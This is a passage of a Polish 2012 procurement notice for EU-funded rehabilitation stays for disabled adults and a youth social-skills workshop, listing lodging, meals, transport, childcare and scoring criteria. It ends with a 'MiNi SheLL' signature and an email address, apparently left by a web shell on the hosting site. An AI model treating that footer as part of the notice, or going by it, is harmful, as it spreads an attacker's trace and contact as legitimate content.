Cel zajęć: zmniejszenie barier zdrowotnych i społecznych przyczyniających się do izolacji społeczno-zawodowej wynikających z niepełnosprawności. 
Osiągnięcie ww. rezultatów należy udokumentować w szczególności wykorzystując takie narzędzia jak ankiety, testy itp. Ponadto Wykonawca (prócz standardowej dokumentacji szkolenia tj. list obecności, programu, ankiet itp.) sporządzi indywidualne karty informacyjne o uczestnikach, zawierające dane nt. oceny funkcjonowania społecznego niepełnosprawnego oraz rodzajów zabiegów i ćwiczeń psychoruchowych, jakimi został objęty (po konsultacji lekarskiej).
Zajęcia winny odbywać się: 
1. W pomieszczeniach dostosowanych do prowadzenia zajęć i odpowiednio w tym celu wyposażonych, dostępnych dla osób niepełnosprawnych tj. w pomieszczeniach posiadających odpowiednie warunki sanitarne, bezpieczeństwa, akustyczne i jakościowe, z dostępem do naturalnego światła słonecznego (dotyczy zajęć w formie warsztatów). 
2. Z uwagi na specyfikę przedmiotu zamówienia Wykonawca zapewni odpowiednie pomieszczenia pozwalające na przeprowadzenie codziennych fizycznych zajęć usprawniających psychoruchowo. 
3. Zamawiający dopuszcza, w przypadku braku odpowiedniego pomieszczenia w miejscu zakwaterowania, przeprowadzenie zajęć fizycznych i/lub zajęć rehabilitacyjnych w innym budynku w najbliższej okolicy. W takiej sytuacji zobowiązany jest zapewnić transport uczestników/uczestniczek tam i z powrotem. 
Materiały dydaktyczne i inne: 
Wykonawca w celu realizacji przedmiotu zamówienia zapewni optymalną ilość materiałów niezbędnych do przeprowadzenia spotkań (np. podręcznik w wydaniu książkowym o treści zgodnej z tematyką spotkań, zeszyt min. 60 kartkowy, ołówek, długopis, teczka na materiały). 
Opieka nad uczestnikami: 
1. Wykonawca zapewni ze swej strony koordynatora działań pobytu odpowiedzialnego za zbiórkę, dowóz uczestników wyjazdu tam i z powrotem, zapewnienie bezpieczeństwa oraz organizację zajęć oraz czasu wolnego i wypoczynku. 
2. Wykonawca zapewni w trakcie pobytu opiekę lekarską i pielęgniarską. 
Opieka nad dziećmi: 
1. Wykonawca na czas nieobecności osób dorosłych (odbywających zajęcia w ramach nin. zamówienia) winien zapewnić opiekę nad małoletnimi dziećmi dostosowaną do wieku dzieci i sprawowaną przez doświadczoną kadrę. 
2. Wykonawca winien zapewnić co najmniej 4 propozycje animacji dla dzieci biorąc także pod uwagę wystąpienie niesprzyjających warunków atmosferycznych (uwzględniając  w szczególności: zabawy ruchowe na powietrzu, spacer po okolicy z możliwością zwiedzenia miejscowych atrakcji, kino, przejście na miejscowy plac zabaw, zajęcia plastyczno-ruchowe na terenie Ośrodka itp). 
Zakwaterowanie: 
1. Obiekt powinien mieścić się w miejscowości  atrakcyjnej pod względem turystycznym, oddalonej do 200km. Od siedziby zamawiającego, posiadać salę szkoleniową, winien dysponować bazą zabiegową z nowoczesnym sprzętem rehabilitacyjnym, salą gimnastyczną, siłownią oraz być przystosowany do potrzeb osób niepełnosprawnych. Dopuszcza się lokalizację bazy zabiegowej poza miejscem zakwaterowania pod warunkiem zapewnienia przez Wykonawcę transportu dla uczestników tam i z powrotem. 
2. Wykonawca zapewni uczestnikom zakwaterowanie w pokojach 2-3 osobowych z pełnym węzłem sanitarnym tj. umywalką, WC, prysznicem z ciepłą i zimną wodą, dostępem do TV, wyposażonych w łóżka jednoosobowe, stolik, krzesła oraz szafki na odzież. Uczestnicy zostaną zakwaterowani 
w sposób uwzględniający płeć lub rodzinę (rodzic z dziećmi), a w przypadku nieparzystej liczby osób zapewniony zostanie pokój jednoosobowy lub dwuosobowy do pojedynczego wykorzystania. 
3. Na terenie obiektu lub w jego bliskiej odległości (ok. 500 m) winien znajdować się basen kryty. 
W przypadku lokalizacji basenu w odległości większej niż 500 m Wykonawca zapewni transport na basen i z powrotem. 
4. Wykonawca zapewni dostępność wody mineralnej w pokojach w ilości 1,5 l dziennie na 1 osobę. 
Wyżywienie: 
1. Wykonawca zapewni w cenie usługi pełne i urozmaicone wyżywienie polegające na przygotowaniu i zaserwowaniu 3 posiłków dziennie (za wyjątkiem dnia przyjazdu i wyjazdu) na każdego uczestnika wyjazdu  w postaci: śniadania w formie szwedzkiego stołu, dwudaniowego obiadu(z porcją mięsa lub ryby) z deserem i napojem oraz  kolacji. Zamawiający nie dopuszcza możliwości serwowania ciepłego obiadu w formie dań gotowych typu fast food oraz gotowych zup typu instant. Z uwagi na obecność dzieci Wykonawca winien uwzględnić potrzeby żywieniowe tej grupy zapewniając rodzicom na ich życzenie dostęp do takich produktów żywnościowych jak np. gorące mleko, płatki śniadaniowe, czekolada lub kakao w proszku (w szczególności podczas śniadania i kolacji)
2.W trakcie odbywania zajęć warsztatowych Wykonawca zapewni codziennie uczestnikom poczęstunek w postaci: dobrej jakości kawy i herbaty (bez ograniczeń), mieszanych drobnych artykułów spożywczych (np. paluszki, krakersy, kruche ciasteczka, babeczki, rurki w ilości min. 100 gr. na osobę), zimnych napojów (np. woda mineralna, soki w ilości 0,5 l na osobę) oraz dodatki takie jak: cukier, mleczko, cytryna. W trakcie sprawowania opieki nad dziećmi, Wykonawca winien zaplanować przerwy w zajęciach animacyjnych, podczas których dzieci będą mogły spożyć drobną przekąskę składającą się z zestawu: np. drożdżówka/pączek/porcja owoców sezonowych oraz napoju np. woda mineralna, soki w ilości 0,5 l na jedno dziecko. 
Transport: 
1. Wykonawca zapewni w cenie usługi transport uczestników i ich bagażu na miejsce i z powrotem wykonywania usługi - pojazdem z ilością miejsc pozwalającą na komfortowe, swobodne podróżowanie zgłoszonej do wyjazdu grupie uczestników, sprawnym technicznie, dopuszczonym do ruchu drogowego. 
2. Miejsce wyjazdu i powrotu uczestników i uczestniczek wskaże Zamawiający (na terenie gminy Mysłowice). 
3. W drodze powrotnej - na czas podróży, Wykonawca zapewni każdemu uczestnikowi wyjazdu napoje na drogę (np. woda mineralna, soki w ilości 0,5 l na osobę). 
Czas wolny: 
W czasie wolnym od zajęć należy zapewnić uczestnikom  oraz ich dzieciom efektywną i atrakcyjną organizację czasu wolnego. Wykonawca winien zapewnić co najmniej cztery formy organizacji czasu wolnego (w tym wycieczkę po okolicy), w szczególności wykorzystując dostępność miejscowych atrakcji takich jak źródła termalne, skanseny dawnej zabudowy, obiekty muzealne (stałe i czasowe ekspozycje), parki krajobrazowe  itp. W przypadku, gdy proponowana animacja znajduje się poza obiektem, Wykonawca zapewni transport autokarem tam i z powrotem. 
Wymagania dodatkowe: 
1. Wykonawca winien ubezpieczyć wszystkich uczestników wyjazdu od następstw nieszczęśliwych wypadków na okres od dnia rozpoczęcia realizacji przedmiotu zamówienia do dnia jego zakończenia. 
2. Wykonawca w pierwszym dniu pobytu zapewni przeprowadzenie badań lekarskich, w trakcie których zostanie ustalona lista zajęć rehabilitacyjnych indywidualnie na każdego uczestnika. 
3. Wykonawca zapewni oznakowanie pomieszczeń, w których będą odbywały się zajęcia zgodnie z aktualnymi wytycznymi Ministra Rozwoju Regionalnego w zakresie informacji i promocji Programu Operacyjnego Kapitał Ludzki, a także zamieszczenie znaków: logo Kapitał Ludzki Narodowa Strategia Spójności, logo Unii Europejskiej z Europejskim Funduszem Społecznym oraz umieszczenie informacji o współfinansowaniu zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Odpowiednie oznakowanie winno znaleźć się również na dokumentach związanych z realizacja warsztatów oraz materiałach przekazywanych uczestnikom warsztatów.
3. Wykonawca zrealizuje dokumentację fotograficzną szkolenia (na płycie CD).
Zajęcia szkoleniowe, zakwaterowanie, wyżywienie oraz sprawowanie opieki nad dziećmi Wykonawca winien zapewnić w obrębie jednego obiektu. 

Pod uwagę brane będą następujące czynniki: program (szkolenia, zabiegów, ćwiczeń, 4 propozycji na spędzanie czasu po zajęciach oraz animacji dla dzieci), cena, lokalizacja- miejsce oraz warunki szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. program szkolenia - 30</li>
<li>3. miejsce szkolenia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> TRENING UMIEJĘTNOŚCI  SPOŁECZNYCH Z ELEMENTAMI PLANOWANIA RODZINY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 18 osób (młodzież w wieku 15- 18 lat) - uczestników/uczestniczek projektu  
Czas  trwania:  8 dni  (7 noclegów) w terminie:  20-31.08.2012 r. (pobyt powinien rozpocząć się i zakończyć obiadem)
Liczba godzin zajęć w formie warsztatów: 35 godzin lekcyjnych  na osobę (8 dni)
Zajęcia w dwóch grupach szkoleniowych.
Zakres tematyczny usługi przewidzianej do wykonania w szczególności obejmuje:  
1) komunikacja interpersonalna i asertywność w kontaktach międzyludzkich,
2) przyczyny stresu i jego niwelowanie; 
3) efektywna motywacja i stawianie sobie nowych wyzwań; 
4) zarządzanie konfliktem i efektywne rozwiązywanie konfliktów,
5) rodzina i jej funkcje, 
6) rozwój psychoseksualny, higiena okresu dojrzewania,  
7) odpowiedzialne zachowania w sferze płciowości, 
8) choroby przenoszone drogą płciową- AIDS), 
9) pornografia i uzależnienia (Internet, środki psychoaktywne)
Cel szkolenia: Nabycie umiejętności  społecznych, związanych m.in. z planowaniem rodziny. Osiągnięcie w-w. rezultatów należy udokumentować w szczególności wykorzystując takie narzędzia jak ankiety, testy itp. 
Materiały dydaktyczne i inne: 
Wykonawca w celu realizacji przedmiotu zamówienia zapewni optymalną ilość materiałów niezbędnych do przeprowadzenia spotkań (np. podręcznik w wydaniu książkowym o treści zgodnej z tematyką spotkań, zeszyt min. 60 kartkowy, ołówek, długopis, teczka na materiały).
Opieka nad uczestnikami: 
Wykonawca zapewni ze swej strony min. 2 opiekunów- również na czas podróży -w tym koordynatora działań pobytu odpowiedzialnego za zbiórkę, dowóz uczestników wyjazdu tam i z powrotem, zapewnienie bezpieczeństwa i organizację zajęć oraz czasu wolnego i wypoczynku.
Zakwaterowanie: 
1. Obiekt powinien mieścić się  w miejscowości atrakcyjnej pod względem turystycznym, oddalonej do 200km od siedziby zamawiającego, posiadać salę szkoleniową, winien dysponować  salą gimnastyczną, siłownią. 
2. Wykonawca zapewni uczestnikom zakwaterowanie w pokojach 2-4 osobowych z pełnym węzłem sanitarnym tj. umywalką, WC, prysznicem z ciepłą i zimną wodą, dostępem do TV, wyposażonych w łóżka jednoosobowe, stolik, krzesła oraz szafki na odzież. Uczestnicy zostaną zakwaterowani w sposób uwzględniający płeć, a w przypadku nieparzystej liczby osób zapewniony zostanie pokój jednoosobowy lub dwuosobowy do pojedynczego wykorzystania. 
3.  Wykonawca zapewni dostępność wody mineralnej w pokojach w ilości 1,5 l dziennie na 1 osobę. 
Wyżywienie: 
1. Wykonawca zapewni w cenie usługi pełne i urozmaicone wyżywienie polegające na przygotowaniu i zaserwowaniu 3 posiłków dziennie (za wyjątkiem dnia przyjazdu i wyjazdu) na każdego uczestnika wyjazdu  w postaci: śniadania w formie szwedzkiego stołu, dwudaniowego obiadu(z porcją mięsa lub ryby) z deserem i napojem oraz  kolacji. Zamawiający nie dopuszcza możliwości serwowania ciepłego obiadu w formie dań gotowych typu fast food oraz gotowych zup typu instant
2.W trakcie odbywania zajęć warsztatowych Wykonawca zapewni codziennie uczestnikom poczęstunek w postaci: dobrej jakości kawy i herbaty (bez ograniczeń), mieszanych drobnych artykułów spożywczych (np. paluszki, krakersy, kruche ciasteczka, babeczki, rurki w ilości min. 100 gr. na osobę), zimnych napojów (np. woda mineralna, soki w ilości 0,5 l na osobę) oraz dodatki takie jak: cukier, mleczko, cytryna. 
Transport: 
1. Wykonawca zapewni w cenie usługi transport uczestników i ich bagażu na miejsce i z powrotem wykonywania usługi - pojazdem z ilością miejsc pozwalającą na komfortowe, swobodne podróżowanie zgłoszonej do wyjazdu grupie uczestników, sprawnym technicznie, dopuszczonym do ruchu drogowego. 
2. Miejsce wyjazdu i powrotu uczestników i uczestniczek wskaże Zamawiający (na terenie gminy Mysłowice). 
3. W drodze powrotnej - na czas podróży, Wykonawca zapewni każdemu uczestnikowi wyjazdu napoje na drogę (np. woda mineralna, soki w ilości 0,5 l na osobę). 
Czas wolny: 
W czasie wolnym od zajęć należy zapewnić uczestnikom   efektywną i atrakcyjną organizację czasu wolnego. Wykonawca winien zapewnić co najmniej cztery formy organizacji czasu wolnego (w tym wycieczkę po okolicy), w szczególności wykorzystując dostępność miejscowych atrakcji takich jak źródła termalne, skanseny dawnej zabudowy, obiekty muzealne (stałe i czasowe ekspozycje), parki krajobrazowe  itp. W przypadku, gdy proponowana animacja znajduje się poza obiektem, Wykonawca zapewni transport autokarem tam i z powrotem. 
Wymagania dodatkowe: 
1. Wykonawca winien ubezpieczyć wszystkich uczestników wyjazdu od następstw nieszczęśliwych wypadków na okres od dnia rozpoczęcia realizacji przedmiotu zamówienia do dnia jego zakończenia.  
2. Wykonawca zapewni oznakowanie pomieszczeń, w których będą odbywały się zajęcia zgodnie z aktualnymi wytycznymi Ministra Rozwoju Regionalnego w zakresie informacji i promocji Programu Operacyjnego Kapitał Ludzki, a także zamieszczenie znaków: logo Kapitał Ludzki Narodowa Strategia Spójności, logo Unii Europejskiej z Europejskim Funduszem Społecznym oraz umieszczenie informacji o współfinansowaniu zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Odpowiednie oznakowanie winno znaleźć się również na dokumentach związanych z realizacja warsztatów oraz materiałach przekazywanych uczestnikom warsztatów.
3. Wykonawca zrealizuje dokumentację fotograficzną szkolenia (na płycie CD).

Pod uwagę brane będą następujące czynniki: program (szkolenia oraz 4 propozycji na spędzanie czasu po zajęciach), cena, lokalizacja- miejsce oraz warunki szkolenia. 
Zajęcia szkoleniowe, zakwaterowanie oraz wyżywienie  Wykonawca winien zapewnić w obrębie jednego obiektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 20.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. program szkolenia - 30</li>
<li>3. miejsce szkolenia - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com